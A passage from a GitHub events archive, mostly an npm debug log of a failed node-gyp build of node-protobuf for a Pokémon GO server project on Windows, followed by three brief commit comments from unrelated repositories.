concat-map@0.0.1\r\n119 silly idealTree +-- configstore@1.4.0\r\n119 silly idealTree +-- console-control-strings@1.1.0\r\n119 silly idealTree +-- convert-source-map@1.3.0\r\n119 silly idealTree +-- core-js@2.4.1\r\n119 silly idealTree +-- core-util-is@1.0.2\r\n119 silly idealTree +-- cryptiles@2.0.5\r\n119 silly idealTree +-- crypto-js@3.1.6\r\n119 silly idealTree +-- cuint@0.2.2\r\n119 silly idealTree +-- currently-unhandled@0.4.1\r\n119 silly idealTree +-- d@0.1.1\r\n119 silly idealTree +-- dashdash@1.14.0\r\n119 silly idealTree | `-- assert-plus@1.0.0\r\n119 silly idealTree +-- debug@2.2.0\r\n119 silly idealTree +-- decamelize@1.2.0\r\n119 silly idealTree +-- deep-extend@0.4.1\r\n119 silly idealTree +-- delayed-stream@1.0.0\r\n119 silly idealTree +-- delegates@1.0.0\r\n119 silly idealTree +-- detect-indent@3.0.1\r\n119 silly idealTree +-- directory-tree@1.1.0\r\n119 silly idealTree +-- duplexer@0.1.1\r\n119 silly idealTree +-- duplexify@3.4.5\r\n119 silly idealTree +-- ecc-jsbn@0.1.1\r\n119 silly idealTree +-- end-of-stream@1.0.0\r\n119 silly idealTree +-- error-ex@1.3.0\r\n119 silly idealTree +-- es5-ext@0.10.12\r\n119 silly idealTree +-- es6-iterator@2.0.0\r\n119 silly idealTree +-- es6-promise@3.2.1\r\n119 silly idealTree +-- es6-symbol@3.1.0\r\n119 silly idealTree +-- escape-string-regexp@1.0.5\r\n119 silly idealTree +-- esutils@2.0.2\r\n119 silly idealTree +-- event-stream@3.3.4\r\n119 silly idealTree +-- expand-brackets@0.1.5\r\n119 silly idealTree +-- expand-range@1.8.2\r\n119 silly idealTree +-- extend@3.0.0\r\n119 silly idealTree +-- extglob@0.3.2\r\n119 silly idealTree +-- extsprintf@1.0.2\r\n119 silly idealTree +-- filename-regex@2.0.0\r\n119 silly idealTree +-- fill-range@2.2.3\r\n119 silly idealTree +-- find-up@1.1.2\r\n119 silly idealTree | `-- path-exists@2.1.0\r\n119 silly idealTree +-- find-versions@1.2.1\r\n119 silly idealTree +-- for-in@0.1.5\r\n119 silly idealTree +-- for-own@0.1.4\r\n119 silly idealTree +-- forever-agent@0.6.1\r\n119 silly idealTree +-- form-data@1.0.0-rc4\r\n119 silly idealTree +-- from@0.1.3\r\n119 silly idealTree +-- fs-extra@0.30.0\r\n119 silly idealTree +-- fs-readdir-recursive@0.1.2\r\n119 silly idealTree +-- fs.realpath@1.0.0\r\n119 silly idealTree +-- fstream-ignore@1.0.5\r\n119 silly idealTree +-- fstream@1.0.10\r\n119 silly idealTree +-- gauge@2.6.0\r\n119 silly idealTree +-- generate-function@2.0.0\r\n119 silly idealTree +-- generate-object-property@1.2.0\r\n119 silly idealTree +-- get-stdin@4.0.1\r\n119 silly idealTree +-- getpass@0.1.6\r\n119 silly idealTree | `-- assert-plus@1.0.0\r\n119 silly idealTree +-- glob-base@0.3.0\r\n119 silly idealTree +-- glob-parent@2.0.0\r\n119 silly idealTree +-- glob@5.0.15\r\n119 silly idealTree +-- globals@8.18.0\r\n119 silly idealTree +-- got@3.3.1\r\n119 silly idealTree | `-- object-assign@3.0.0\r\n119 silly idealTree +-- gpsoauthnode@0.0.5\r\n119 silly idealTree +-- graceful-fs@4.1.6\r\n119 silly idealTree +-- graceful-readlink@1.0.1\r\n119 silly idealTree +-- har-validator@2.0.6\r\n119 silly idealTree +-- has-ansi@2.0.0\r\n119 silly idealTree +-- has-color@0.1.7\r\n119 silly idealTree +-- has-unicode@2.0.1\r\n119 silly idealTree +-- hawk@3.1.3\r\n119 silly idealTree +-- hoek@2.16.3\r\n119 silly idealTree +-- home-or-tmp@1.0.0\r\n119 silly idealTree +-- hosted-git-info@2.1.5\r\n119 silly idealTree +-- http-signature@1.1.1\r\n119 silly idealTree +-- ignore-by-default@1.0.1\r\n119 silly idealTree +-- imurmurhash@0.1.4\r\n119 silly idealTree +-- indent-string@2.1.0\r\n119 silly idealTree | `-- repeating@2.0.1\r\n119 silly idealTree +-- infinity-agent@2.0.3\r\n119 silly idealTree +-- inflight@1.0.5\r\n119 silly idealTree +-- inherits@2.0.1\r\n119 silly idealTree +-- ini@1.3.4\r\n119 silly idealTree +-- invariant@2.2.1\r\n119 silly idealTree +-- invert-kv@1.0.0\r\n119 silly idealTree +-- is-arrayish@0.2.1\r\n119 silly idealTree +-- is-binary-path@1.0.1\r\n119 silly idealTree +-- is-buffer@1.1.4\r\n119 silly idealTree +-- is-builtin-module@1.0.0\r\n119 silly idealTree +-- is-dotfile@1.0.2\r\n119 silly idealTree +-- is-equal-shallow@0.1.3\r\n119 silly idealTree +-- is-extendable@0.1.1\r\n119 silly idealTree +-- is-extglob@1.0.0\r\n119 silly idealTree +-- is-finite@1.0.1\r\n119 silly idealTree +-- is-fullwidth-code-point@1.0.0\r\n119 silly idealTree +-- is-glob@2.0.1\r\n119 silly idealTree +-- is-my-json-valid@2.13.1\r\n119 silly idealTree +-- is-npm@1.0.0\r\n119 silly idealTree +-- is-number@2.1.0\r\n119 silly idealTree +-- is-posix-bracket@0.1.1\r\n119 silly idealTree +-- is-primitive@2.0.0\r\n119 silly idealTree +-- is-property@1.0.2\r\n119 silly idealTree +-- is-redirect@1.0.0\r\n119 silly idealTree +-- is-stream@1.1.0\r\n119 silly idealTree +-- is-typedarray@1.0.0\r\n119 silly idealTree +-- is-utf8@0.2.1\r\n119 silly idealTree +-- isarray@1.0.0\r\n119 silly idealTree +-- isexe@1.1.2\r\n119 silly idealTree +-- isobject@2.1.0\r\n119 silly idealTree +-- isstream@0.1.2\r\n119 silly idealTree +-- jodid25519@1.0.2\r\n119 silly idealTree +-- js-tokens@2.0.0\r\n119 silly idealTree +-- jsbn@0.1.0\r\n119 silly idealTree +-- jsesc@0.5.0\r\n119 silly idealTree +-- json-schema@0.2.2\r\n119 silly idealTree +-- json-stringify-safe@5.0.1\r\n119 silly idealTree +-- json5@0.4.0\r\n119 silly idealTree +-- jsonfile@2.3.1\r\n119 silly idealTree +-- jsonpointer@2.0.0\r\n119 silly idealTree +-- jsprim@1.3.0\r\n119 silly idealTree +-- jwt-decode@2.1.0\r\n119 silly idealTree +-- kind-of@3.0.4\r\n119 silly idealTree +-- klaw@1.3.0\r\n119 silly idealTree +-- latest-version@1.0.1\r\n119 silly idealTree +-- lcid@1.0.0\r\n119 silly idealTree +-- load-json-file@1.1.0\r\n119 silly idealTree +-- lodash._baseassign@3.2.0\r\n119 silly idealTree +-- lodash._basecopy@3.0.1\r\n119 silly idealTree +-- lodash._bindcallback@3.0.1\r\n119 silly idealTree +-- lodash._createassigner@3.1.1\r\n119 silly idealTree +-- lodash._getnative@3.9.1\r\n119 silly idealTree +-- lodash._isiterateecall@3.0.9\r\n119 silly idealTree +-- lodash.assign@3.2.0\r\n119 silly idealTree +-- lodash.defaults@3.1.2\r\n119 silly idealTree +-- lodash.isarguments@3.1.0\r\n119 silly idealTree +-- lodash.isarray@3.0.4\r\n119 silly idealTree +-- lodash.keys@3.1.2\r\n119 silly idealTree +-- lodash.restparam@3.6.1\r\n119 silly idealTree +-- lodash@4.15.0\r\n119 silly idealTree +-- log-symbols@1.0.2\r\n119 silly idealTree +-- long@3.2.0\r\n119 silly idealTree +-- loose-envify@1.2.0\r\n119 silly idealTree | `-- js-tokens@1.0.3\r\n119 silly idealTree +-- loud-rejection@1.6.0\r\n119 silly idealTree +-- lowercase-keys@1.0.0\r\n119 silly idealTree +-- map-obj@1.0.1\r\n119 silly idealTree +-- map-stream@0.1.0\r\n119 silly idealTree +-- meow@3.7.0\r\n119 silly idealTree +-- micromatch@2.3.11\r\n119 silly idealTree +-- mime-db@1.23.0\r\n119 silly idealTree +-- mime-types@2.1.11\r\n119 silly idealTree +-- minimatch@3.0.3\r\n119 silly idealTree +-- minimist@1.2.0\r\n119 silly idealTree +-- mkdirp@0.5.1\r\n119 silly idealTree | `-- minimist@0.0.8\r\n119 silly idealTree +-- mongodb-core@2.0.10\r\n119 silly idealTree +-- mongodb@2.2.8\r\n119 silly idealTree +-- ms@0.7.1\r\n119 silly idealTree +-- mysql@2.11.1\r\n119 silly idealTree | +-- isarray@0.0.1\r\n119 silly idealTree | `-- readable-stream@1.1.14\r\n119 silly idealTree +-- nan@2.4.0\r\n119 silly idealTree +-- nested-error-stacks@1.0.2\r\n119 silly idealTree +-- node-gyp@3.4.0\r\n119 silly idealTree | `-- glob@7.0.6\r\n119 silly idealTree +-- node-pogo-protos@1.4.0\r\n119 silly idealTree +-- node-pogo-signature@2.0.2\r\n119 silly idealTree +-- node-pre-gyp@0.6.29\r\n119 silly idealTree | `-- semver@5.2.0\r\n119 silly idealTree +-- node-protobuf@1.3.3\r\n119 silly idealTree +-- node-uuid@1.4.7\r\n119 silly idealTree +-- nodegit-promise@4.0.0\r\n119 silly idealTree +-- nodegit@0.14.1\r\n119 silly idealTree | `-- fs-extra@0.26.7\r\n119 silly idealTree +-- nodemon@1.10.2\r\n119 silly idealTree +-- nopt@3.0.6\r\n119 silly idealTree +-- normalize-package-data@2.3.5\r\n119 silly idealTree +-- normalize-path@2.0.1\r\n119 silly idealTree +-- npmlog@3.1.2\r\n119 silly idealTree +-- number-is-nan@1.0.0\r\n119 silly idealTree +-- oauth-sign@0.8.2\r\n119 silly idealTree +-- object-assign@4.1.0\r\n119 silly idealTree +-- object.omit@2.0.0\r\n119 silly idealTree +-- once@1.3.3\r\n119 silly idealTree +-- optjs@3.2.2\r\n119 silly idealTree +-- os-homedir@1.0.1\r\n119 silly idealTree +-- os-locale@1.4.0\r\n119 silly idealTree +-- os-tmpdir@1.0.1\r\n119 silly idealTree +-- osenv@0.1.3\r\n119 silly idealTree +-- output-file-sync@1.1.2\r\n119 silly idealTree +-- package-json@1.2.0\r\n119 silly idealTree +-- parse-glob@3.0.4\r\n119 silly idealTree +-- parse-json@2.2.0\r\n119 silly idealTree +-- path-array@1.0.1\r\n119 silly idealTree +-- path-exists@1.0.0\r\n119 silly idealTree +-- path-is-absolute@1.0.0\r\n119 silly idealTree +-- path-type@1.1.0\r\n119 silly idealTree +-- path@0.12.7\r\n119 silly idealTree +-- pause-stream@0.0.11\r\n119 silly idealTree +-- pcrypt@1.0.0\r\n119 silly idealTree +-- pify@2.3.0\r\n119 silly idealTree +-- pinkie-promise@2.0.1\r\n119 silly idealTree +-- pinkie@2.0.4\r\n119 silly idealTree +-- pogo-asset-downloader@0.3.1\r\n119 silly idealTree +-- pogobuf@1.6.0\r\n119 silly idealTree +-- pokemongo-protobuf@1.11.0\r\n119 silly idealTree +-- pokename@0.3.0\r\n119 silly idealTree +-- prepend-http@1.0.4\r\n119 silly idealTree +-- preserve@0.2.0\r\n119 silly idealTree +-- private@0.1.6\r\n119 silly idealTree +-- process-nextick-args@1.0.7\r\n119 silly idealTree +-- process@0.11.8\r\n119 silly idealTree +-- promisify-node@0.3.0\r\n119 silly idealTree +-- protobufjs@5.0.1\r\n119 silly idealTree +-- ps-tree@1.1.0\r\n119 silly idealTree +-- qs@6.2.1\r\n119 silly idealTree +-- randomatic@1.1.5\r\n119 silly idealTree +-- rc@1.1.6\r\n119 silly idealTree +-- read-all-stream@3.1.0\r\n119 silly idealTree +-- read-pkg-up@1.0.1\r\n119 silly idealTree +-- read-pkg@1.1.0\r\n119 silly idealTree +-- readable-stream@2.1.5\r\n119 silly idealTree +-- readdirp@2.1.0\r\n119 silly idealTree +-- redent@1.0.0\r\n119 silly idealTree +-- regenerate@1.3.1\r\n119 silly idealTree +-- regenerator-runtime@0.9.5\r\n119 silly idealTree +-- regex-cache@0.4.3\r\n119 silly idealTree +-- regexpu-core@2.0.0\r\n119 silly idealTree +-- registry-url@3.1.0\r\n119 silly idealTree +-- regjsgen@0.2.0\r\n119 silly idealTree +-- regjsparser@0.1.5\r\n119 silly idealTree +-- repeat-element@1.1.2\r\n119 silly idealTree +-- repeat-string@1.5.4\r\n119 silly idealTree +-- repeating@1.1.3\r\n119 silly idealTree +-- request@2.74.0\r\n119 silly idealTree +-- require_optional@1.0.0\r\n119 silly idealTree | `-- semver@5.3.0\r\n119 silly idealTree +-- resolve-from@2.0.0\r\n119 silly idealTree +-- rimraf@2.5.4\r\n119 silly idealTree | `-- glob@7.0.6\r\n119 silly idealTree +-- s2-geometry@1.2.9\r\n119 silly idealTree +-- semver-diff@2.1.0\r\n119 silly idealTree | `-- semver@5.3.0\r\n119 silly idealTree +-- semver-regex@1.0.0\r\n119 silly idealTree +-- semver-truncate@1.1.2\r\n119 silly idealTree | `-- semver@5.3.0\r\n119 silly idealTree +-- semver@4.3.6\r\n119 silly idealTree +-- set-blocking@2.0.0\r\n119 silly idealTree +-- set-immediate-shim@1.0.1\r\n119 silly idealTree +-- shebang-regex@1.0.0\r\n119 silly idealTree +-- signal-exit@3.0.0\r\n119 silly idealTree +-- slash@1.0.0\r\n119 silly idealTree +-- slide@1.1.6\r\n119 silly idealTree +-- sntp@1.0.9\r\n119 silly idealTree +-- source-map-support@0.2.10\r\n119 silly idealTree | `-- source-map@0.1.32\r\n119 silly idealTree +-- source-map@0.5.6\r\n119 silly idealTree +-- spdx-correct@1.0.2\r\n119 silly idealTree +-- spdx-exceptions@1.0.5\r\n119 silly idealTree +-- spdx-expression-parse@1.0.2\r\n119 silly idealTree +-- spdx-license-ids@1.2.2\r\n119 silly idealTree +-- split@0.3.3\r\n119 silly idealTree +-- sqlstring@2.0.1\r\n119 silly idealTree +-- sshpk@1.9.2\r\n119 silly idealTree | `-- assert-plus@1.0.0\r\n119 silly idealTree +-- stream-combiner@0.0.4\r\n119 silly idealTree +-- stream-shift@1.0.0\r\n119 silly idealTree +-- string_decoder@0.10.31\r\n119 silly idealTree +-- string-length@1.0.1\r\n119 silly idealTree +-- string-width@1.0.2\r\n119 silly idealTree +-- stringstream@0.0.5\r\n119 silly idealTree +-- strip-ansi@3.0.1\r\n119 silly idealTree +-- strip-bom@2.0.0\r\n119 silly idealTree +-- strip-indent@1.0.1\r\n119 silly idealTree +-- strip-json-comments@1.0.4\r\n119 silly idealTree +-- supports-color@2.0.0\r\n119 silly idealTree +-- tar-pack@3.1.4\r\n119 silly idealTree +-- tar@2.2.1\r\n119 silly idealTree +-- through@2.3.8\r\n119 silly idealTree +-- timed-out@2.0.0\r\n119 silly idealTree +-- to-fast-properties@1.0.2\r\n119 silly idealTree +-- touch@1.0.0\r\n119 silly idealTree | `-- nopt@1.0.10\r\n119 silly idealTree +-- tough-cookie@2.3.1\r\n119 silly idealTree +-- trim-newlines@1.0.0\r\n119 silly idealTree +-- tunnel-agent@0.4.3\r\n119 silly idealTree +-- tweetnacl@0.13.3\r\n119 silly idealTree +-- uid-number@0.0.6\r\n119 silly idealTree +-- undefsafe@0.0.3\r\n119 silly idealTree +-- update-notifier@0.5.0\r\n119 silly idealTree +-- user-home@1.1.1\r\n119 silly idealTree +-- util-deprecate@1.0.2\r\n119 silly idealTree +-- util@0.10.3\r\n119 silly idealTree +-- uuid@2.0.2\r\n119 silly idealTree +-- v8flags@2.0.11\r\n119 silly idealTree +-- validate-npm-package-license@3.0.1\r\n119 silly idealTree +-- verror@1.3.6\r\n119 silly idealTree +-- which@1.2.10\r\n119 silly idealTree +-- wide-align@1.1.0\r\n119 silly idealTree +-- window-size@0.1.4\r\n119 silly idealTree +-- wrap-ansi@2.0.0\r\n119 silly idealTree +-- wrappy@1.0.2\r\n119 silly idealTree +-- write-file-atomic@1.2.0\r\n119 silly idealTree +-- xdg-basedir@2.0.0\r\n119 silly idealTree +-- xtend@4.0.1\r\n119 silly idealTree +-- xxhashjs@0.2.1\r\n119 silly idealTree +-- y18n@3.2.1\r\n119 silly idealTree `-- yargs@3.32.0\r\n120 silly generateActionsToTake Starting\r\n121 silly install generateActionsToTake\r\n122 silly generateActionsToTake Finishing\r\n123 silly diffTrees action count 1\r\n124 silly diffTrees update node-protobuf@1.3.3\r\n125 silly decomposeActions action count 8\r\n126 silly decomposeActions fetch node-protobuf@1.3.3\r\n127 silly decomposeActions extract node-protobuf@1.3.3\r\n128 silly decomposeActions test node-protobuf@1.3.3\r\n129 silly decomposeActions preinstall node-protobuf@1.3.3\r\n130 silly decomposeActions build node-protobuf@1.3.3\r\n131 silly decomposeActions install node-protobuf@1.3.3\r\n132 silly decomposeActions postinstall node-protobuf@1.3.3\r\n133 silly decomposeActions finalize node-protobuf@1.3.3\r\n134 silly executeActions Starting\r\n135 silly install executeActions\r\n136 silly doSerial global-install 0\r\n137 silly doParallel fetch 1\r\n138 verbose correctMkdir C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\_locks correctMkdir not in flight; initializing\r\n139 verbose lock using C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\_locks\\staging-c989dc7272cfd7e1.lock for F:\\pokemon\\server\\node_modules\\.staging\r\n140 silly doParallel extract 1\r\n141 silly extract node-protobuf@1.3.3\r\n142 verbose unbuild node_modules\\.staging\\node-protobuf-82d2cba1\r\n143 silly gentlyRm F:\\pokemon\\server\\node_modules\\.staging\\node-protobuf-82d2cba1 is being purged from base F:\\pokemon\\server\r\n144 verbose gentlyRm don't care about contents; nuking F:\\pokemon\\server\\node_modules\\.staging\\node-protobuf-82d2cba1\r\n145 verbose tar unpack C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\node-protobuf\\1.3.3\\package.tgz\r\n146 verbose tar unpacking to F:\\pokemon\\server\\node_modules\\.staging\\node-protobuf-82d2cba1\r\n147 silly gentlyRm F:\\pokemon\\server\\node_modules\\.staging\\node-protobuf-82d2cba1 is being purged\r\n148 verbose gentlyRm don't care about contents; nuking F:\\pokemon\\server\\node_modules\\.staging\\node-protobuf-82d2cba1\r\n149 silly gunzTarPerm modes [ '777', '666' ]\r\n150 silly gunzTarPerm extractEntry package.json\r\n151 silly gunzTarPerm modified mode [ 'package.json', 420, 438 ]\r\n152 silly gunzTarPerm extractEntry .npmignore\r\n153 silly gunzTarPerm modified mode [ '.npmignore', 420, 438 ]\r\n154 silly gunzTarPerm extractEntry README.md\r\n155 silly gunzTarPerm modified mode [ 'README.md', 420, 438 ]\r\n156 silly gunzTarPerm extractEntry Gruntfile.js\r\n157 silly gunzTarPerm modified mode [ 'Gruntfile.js', 420, 438 ]\r\n158 silly gunzTarPerm extractEntry protobuf.js\r\n159 silly gunzTarPerm modified mode [ 'protobuf.js', 420, 438 ]\r\n160 silly gunzTarPerm extractEntry binding.gyp\r\n161 silly gunzTarPerm modified mode [ 'binding.gyp', 420, 438 ]\r\n162 silly gunzTarPerm extractEntry CHANGES.md\r\n163 silly gunzTarPerm modified mode [ 'CHANGES.md', 420, 438 ]\r\n164 silly gunzTarPerm extractEntry .gitattributes\r\n165 silly gunzTarPerm modified mode [ '.gitattributes', 420, 438 ]\r\n166 silly gunzTarPerm extractEntry .clang-format\r\n167 silly gunzTarPerm modified mode [ '.clang-format', 420, 438 ]\r\n168 silly gunzTarPerm extractEntry generate-descriptors.sh\r\n169 silly gunzTarPerm modified mode [ 'generate-descriptors.sh', 493, 511 ]\r\n170 silly gunzTarPerm extractEntry lp.sh\r\n171 silly gunzTarPerm modified mode [ 'lp.sh', 420, 438 ]\r\n172 silly gunzTarPerm extractEntry src/common.h\r\n173 silly gunzTarPerm modified mode [ 'src/common.h', 420, 438 ]\r\n174 silly gunzTarPerm extractEntry src/init.cpp\r\n175 silly gunzTarPerm modified mode [ 'src/init.cpp', 420, 438 ]\r\n176 silly gunzTarPerm extractEntry src/native.cpp\r\n177 silly gunzTarPerm modified mode [ 'src/native.cpp', 420, 438 ]\r\n178 silly gunzTarPerm extractEntry src/native.cpp.orig\r\n179 silly gunzTarPerm modified mode [ 'src/native.cpp.orig', 420, 438 ]\r\n180 silly gunzTarPerm extractEntry src/native.h\r\n181 silly gunzTarPerm modified mode [ 'src/native.h', 420, 438 ]\r\n182 silly gunzTarPerm extractEntry src/parse.cpp\r\n183 silly gunzTarPerm modified mode [ 'src/parse.cpp', 420, 438 ]\r\n184 silly gunzTarPerm extractEntry src/parse.h\r\n185 silly gunzTarPerm modified mode [ 'src/parse.h', 420, 438 ]\r\n186 silly gunzTarPerm extractEntry src/serialize.cpp\r\n187 silly gunzTarPerm modified mode [ 'src/serialize.cpp', 420, 438 ]\r\n188 silly gunzTarPerm extractEntry src/serialize.h\r\n189 silly gunzTarPerm modified mode [ 'src/serialize.h', 420, 438 ]\r\n190 silly gunzTarPerm extractEntry .travis.yml\r\n191 silly gunzTarPerm modified mode [ '.travis.yml', 420, 438 ]\r\n192 silly gunzTarPerm extractEntry test/test.js\r\n193 silly gunzTarPerm modified mode [ 'test/test.js', 420, 438 ]\r\n194 silly gunzTarPerm extractEntry test/perf/perfTest.js\r\n195 silly gunzTarPerm modified mode [ 'test/perf/perfTest.js', 420, 438 ]\r\n196 silly gunzTarPerm extractEntry test/perf/points.js\r\n197 silly gunzTarPerm modified mode [ 'test/perf/points.js', 420, 438 ]\r\n198 silly gunzTarPerm extractEntry test/perf/perfTest.desc\r\n199 silly gunzTarPerm modified mode [ 'test/perf/perfTest.desc', 420, 438 ]\r\n200 silly gunzTarPerm extractEntry test/perf/perfTest.proto\r\n201 silly gunzTarPerm modified mode [ 'test/perf/perfTest.proto', 420, 438 ]\r\n202 silly gunzTarPerm extractEntry test/perf/points.desc\r\n203 silly gunzTarPerm modified mode [ 'test/perf/points.desc', 420, 438 ]\r\n204 silly gunzTarPerm extractEntry test/perf/points.proto\r\n205 silly gunzTarPerm modified mode [ 'test/perf/points.proto', 420, 438 ]\r\n206 silly gunzTarPerm extractEntry test/test.desc\r\n207 silly gunzTarPerm modified mode [ 'test/test.desc', 420, 438 ]\r\n208 silly gunzTarPerm extractEntry test/test.proto\r\n209 silly gunzTarPerm modified mode [ 'test/test.proto', 420, 438 ]\r\n210 silly gunzTarPerm extractEntry test/testUnknown.desc\r\n211 silly gunzTarPerm modified mode [ 'test/testUnknown.desc', 420, 438 ]\r\n212 silly gunzTarPerm extractEntry test/testUnknown.proto\r\n213 silly gunzTarPerm modified mode [ 'test/testUnknown.proto', 420, 438 ]\r\n214 silly gentlyRm F:\\pokemon\\server\\node_modules\\.staging\\node-protobuf-82d2cba1\\node_modules is being purged\r\n215 verbose gentlyRm don't care about contents; nuking F:\\pokemon\\server\\node_modules\\.staging\\node-protobuf-82d2cba1\\node_modules\r\n216 silly doParallel preinstall 1\r\n217 silly preinstall node-protobuf@1.3.3 F:\\pokemon\\server\\node_modules\\.staging\\node-protobuf-82d2cba1\r\n218 info lifecycle node-protobuf@1.3.3~preinstall: node-protobuf@1.3.3\r\n219 silly lifecycle node-protobuf@1.3.3~preinstall: no script for preinstall, continuing\r\n220 silly doReverseSerial remove 0\r\n221 silly doSerial move 0\r\n222 silly doSerial finalize 1\r\n223 silly finalize F:\\pokemon\\server\\node_modules\\node-protobuf\r\n224 silly doSerial build 1\r\n225 silly build node-protobuf@1.3.3\r\n226 info linkStuff node-protobuf@1.3.3\r\n227 silly linkStuff node-protobuf@1.3.3 has F:\\pokemon\\server\\node_modules as its parent node_modules\r\n228 verbose linkBins node-protobuf@1.3.3\r\n229 verbose linkMans node-protobuf@1.3.3\r\n230 silly doSerial global-link 0\r\n231 silly doParallel update-linked 0\r\n232 silly doSerial install 1\r\n233 silly install node-protobuf@1.3.3 F:\\pokemon\\server\\node_modules\\.staging\\node-protobuf-82d2cba1\r\n234 info lifecycle node-protobuf@1.3.3~install: node-protobuf@1.3.3\r\n235 verbose lifecycle node-protobuf@1.3.3~install: unsafe-perm in lifecycle true\r\n236 verbose lifecycle node-protobuf@1.3.3~install: PATH: C:\\Program Files\\nodejs\\node_modules\\npm\\bin\\node-gyp-bin;F:\\pokemon\\server\\node_modules\\node-protobuf\\node_modules\\.bin;F:\\pokemon\\server\\node_modules\\.bin;C:\\Program Files\\nodejs;C:\\Python27\\;C:\\Python27\\Scripts;C:\\Program Files (x86)\\NVIDIA Corporation\\PhysX\\Common;C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Program Files\\Broadcom\\Broadcom 802.11 Network Adapter;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;c:\\Program Files (x86)\\ATI Technologies\\ATI.ACE\\Core-Static;C:\\Program Files (x86)\\AMD\\ATI.ACE\\Core-Static;C:\\Program Files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\;C:\\Program Files\\Microsoft SQL Server\\100\\Tools\\Binn\\;C:\\Program Files\\Microsoft SQL Server\\100\\DTS\\Binn\\;C:\\Program Files\\Microsoft\\Web Platform Installer\\;C:\\Program Files (x86)\\Microsoft ASP.NET\\ASP.NET Web Pages\\v1.0\\;C:\\Program Files (x86)\\Windows Kits\\8.0\\Windows Performance Toolkit\\;C:\\Program Files\\Microsoft SQL Server\\110\\Tools\\Binn\\;C:\\Program Files (x86)\\GtkSharp\\2.12\\bin;C:\\Program Files\\nodejs\\;C:\\Program Files\\Git\\cmd;C:\\Users\\codex\\AppData\\Roaming\\Python\\Scripts;C:\\Users\\codex\\AppData\\Roaming\\npm\r\n237 verbose lifecycle node-protobuf@1.3.3~install: CWD: F:\\pokemon\\server\\node_modules\\node-protobuf\r\n238 silly lifecycle node-protobuf@1.3.3~install: Args: [ '/d /s /c', 'node-gyp rebuild' ]\r\n239 silly lifecycle node-protobuf@1.3.3~install: Returned: code: 1  signal: null\r\n240 info lifecycle node-protobuf@1.3.3~install: Failed to exec install script\r\n241 verbose unlock done using C:\\Users\\codex\\AppData\\Roaming\\npm-cache\\_locks\\staging-c989dc7272cfd7e1.lock for F:\\pokemon\\server\\node_modules\\.staging\r\n242 silly rollbackFailedOptional Starting\r\n243 silly rollbackFailedOptional Finishing\r\n244 silly runTopLevelLifecycles Starting\r\n245 silly runTopLevelLifecycles Finishing\r\n246 silly install printInstalled\r\n247 warn optional Skipping failed optional dependency /chokidar/fsevents:\r\n248 warn notsup Not compatible with your operating system or architecture: fsevents@1.0.14\r\n249 warn POGOServer@0.5.5 license should be a valid SPDX license expression\r\n250 verbose stack Error: node-protobuf@1.3.3 install: `node-gyp rebuild`\r\n250 verbose stack Exit status 1\r\n250 verbose stack     at EventEmitter.<anonymous> (C:\\Program Files\\nodejs\\node_modules\\npm\\lib\\utils\\lifecycle.js:242:16)\r\n250 verbose stack     at emitTwo (events.js:106:13)\r\n250 verbose stack     at EventEmitter.emit (events.js:191:7)\r\n250 verbose stack     at ChildProcess.<anonymous> (C:\\Program Files\\nodejs\\node_modules\\npm\\lib\\utils\\spawn.js:40:14)\r\n250 verbose stack     at emitTwo (events.js:106:13)\r\n250 verbose stack     at ChildProcess.emit (events.js:191:7)\r\n250 verbose stack     at maybeClose (internal/child_process.js:877:16)\r\n250 verbose stack     at Process.ChildProcess._handle.onexit (internal/child_process.js:226:5)\r\n251 verbose pkgid node-protobuf@1.3.3\r\n252 verbose cwd F:\\pokemon\\server\r\n253 error Windows_NT 10.0.10586\r\n254 error argv \"C:\\\\Program Files\\\\nodejs\\\\node.exe\" \"C:\\\\Program Files\\\\nodejs\\\\node_modules\\\\npm\\\\bin\\\\npm-cli.js\" \"install\" \"node-protobuf\"\r\n255 error node v6.5.0\r\n256 error npm  v3.10.3\r\n257 error code ELIFECYCLE\r\n258 error node-protobuf@1.3.3 install: `node-gyp rebuild`\r\n258 error Exit status 1\r\n259 error Failed at the node-protobuf@1.3.3 install script 'node-gyp rebuild'.\r\n259 error Make sure you have the latest version of node.js and npm installed.\r\n259 error If you do, this is most likely a problem with the node-protobuf package,\r\n259 error not with npm itself.\r\n259 error Tell the author that this fails on your system:\r\n259 error     node-gyp rebuild\r\n259 error You can get information on how to open an issue for this project with:\r\n259 error     npm bugs node-protobuf\r\n259 error Or if that isn't available, you can get their info via:\r\n259 error     npm owner ls node-protobuf\r\n259 error There is likely additional logging output above.\r\n260 verbose exit [ 1, true ]\r\n`"}},"created_at":"2016-09-06T12:56:24Z"}
{"id":"4521137280","type":"CommitCommentEvent","actor":{"login":"MrWeezle"},"repo":{"name":"feodor84/apager_res"},"payload":{"comment":{"id":18910530,"position":null,"line":null,"path":null,"commit_id":"9f139c6eed4bd3b951cd9b03fe092b058af0d046","created_at":"2016-09-06T12:58:08Z","updated_at":"2016-09-06T12:58:08Z","body":"Completed 83%"}},"created_at":"2016-09-06T12:58:08Z"}
{"id":"4521137304","type":"CommitCommentEvent","actor":{"login":"toxicFork"},"repo":{"name":"toxicFork/react-three-renderer-example"},"payload":{"comment":{"id":18910531,"position":8,"line":8,"path":"src/examples/GeometryShapes/Resources.js","commit_id":"839706564d971ebb0fc77d40dbf02a7d8de41069","created_at":"2016-09-06T12:58:08Z","updated_at":"2016-09-06T12:58:08Z","body":"I was just too eager with optimization :P I'll fix the render and make it pure for next version :)"}},"created_at":"2016-09-06T12:58:08Z"}
{"id":"4521137436","type":"CommitCommentEvent","actor":{"login":"46labs"},"repo":{"name":"OpenSIPS/opensips"},"payload":{"comment":{"id":18910533,"position":null,"line":null,"path":null,"commit_id":"2adc1140bc8c672f9831f8e2be8d488cf990cbda","created_at":"2016-09-06T12:58:10Z","updated_at":"2016-09-06T12:58:10Z","body":"Can I place a vote that this be tested and backported to 2.2, as the behavior in 2.2 for re-invite pings could cause instability issues on servers with many created dialogs. Furthermore, it is tough to justify that the first re-invite interval happens *randomly* between 1 second and the re-invite interval. "}},"created_at":"2016-09-06T12:58:10Z"}
